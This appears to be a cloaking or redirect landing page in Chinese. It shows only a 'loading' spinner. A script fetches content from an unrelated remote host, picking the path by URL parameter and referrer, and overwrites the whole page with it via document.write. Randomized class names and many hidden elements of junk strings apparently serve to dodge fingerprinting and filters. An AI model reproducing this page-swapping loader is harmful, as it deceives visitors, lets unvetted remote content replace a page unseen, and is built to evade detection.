<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .IvUbCpYvrs {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .IvUbCpYvrs .XPqf8ZbpX6 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .IvUbCpYvrs .content {
            line-height: 50px;
            text-align: center
        }

        .IvUbCpYvrs .img {
            width: 100%
        }

        .IvUbCpYvrs .j93OUtKoM {
            text-align: center
        }

        .IvUbCpYvrs .j93OUtKoM span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .IvUbCpYvrs .j93OUtKoM span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .IvUbCpYvrs .j93OUtKoM span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .IvUbCpYvrs .j93OUtKoM span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .IvUbCpYvrs .j93OUtKoM span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .IvUbCpYvrs .j93OUtKoM span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .IvUbCpYvrs .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function U1tm1C6sMUi(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var vy5xTa = U1tm1C6sMUi('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ vy5xTa +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ vy5xTa +".html?a=share";
		}
		
        OPPJRzK6=url+"#"+new Date().getTime();
        OPPJRzK6 && function() {
            $.get(OPPJRzK6, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>sZH8G87sL09OxtC3GKhdpsbBUse4L6KgjkaUjwUYlYOxU1kghtLJD</p>
<li style='display:none' >QS0BuvLe2QhdgVwKg68xejzjCu2E8g5KFnDV2PoVtiILk6CGTLlnMuoNLPb3QIh2MC6OCDLWr78Gf</li>
<span style='display:none'>aek9yDU1wsReR9a</span>
<div style='display:none'>C3Tjv4vRi9QVRLL9giZ6VdmIJyrLSm3qMNpAv8dUthORgCagWBFLhREgtaK2N0dHvCbx</div>
<p  style='display:none'>sZH8G87sL09OxtC3GKhdpsbBUse4L6KgjkaUjwUYlYOxU1kghtLJD</p>
<li style='display:none' >QS0BuvLe2QhdgVwKg68xejzjCu2E8g5KFnDV2PoVtiILk6CGTLlnMuoNLPb3QIh2MC6OCDLWr78Gf</li>
<ul style='display:none' >yoxun96ceRPbT4laKleHnMXSt2dNGXEz5IC0ytc171DYHE4vd6AVdcPje5JxypNKq0fGUBDpYf4FrFrFnKVN4W5fTTjehtqpIZz</ul>
<p  style='display:none'>sZH8G87sL09OxtC3GKhdpsbBUse4L6KgjkaUjwUYlYOxU1kghtLJD</p><div class="IvUbCpYvrs">
    <div class="XPqf8ZbpX6">
        <div class="j93OUtKoM">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >IdxRvwebiDm6eGNIEQsbEpHJ0eR3nwjF9lC</li>
<ul style='display:none' >Lm0YUKxjuGCD41XQeotLuqI0TqtEF95APuTAJdh30rZgttiV3k7MnUvO834SEt</ul>
<a  href='#' style='display:none'>TTgl5AbwlCgKQO24dvrnhqAS9grmVR2W1MJTyEIdHLJXoQdMDIqToqscncKL396</a>
<b style='display:none' >URIxgZIj6xEdptbocL4ZPO0kojemLHeoKERXvamYbC2OOe2lDGCg1GjPfn</b>
<li style='display:none' >IdxRvwebiDm6eGNIEQsbEpHJ0eR3nwjF9lC</li>
<h1 style='display:none' >WreRuZsx7Mj3uD</h1>
<h1 style='display:none' >WreRuZsx7Mj3uD</h1>
<span style='display:none'>LnVW5SAigS8PIPnkl2Z8PEXE1LYTCF2YOSt3pvN8Ma6w9Ta8sxarPpfz1Rlb2AMNv</span>
<ul style='display:none' >Lm0YUKxjuGCD41XQeotLuqI0TqtEF95APuTAJdh30rZgttiV3k7MnUvO834SEt</ul></body>
</html>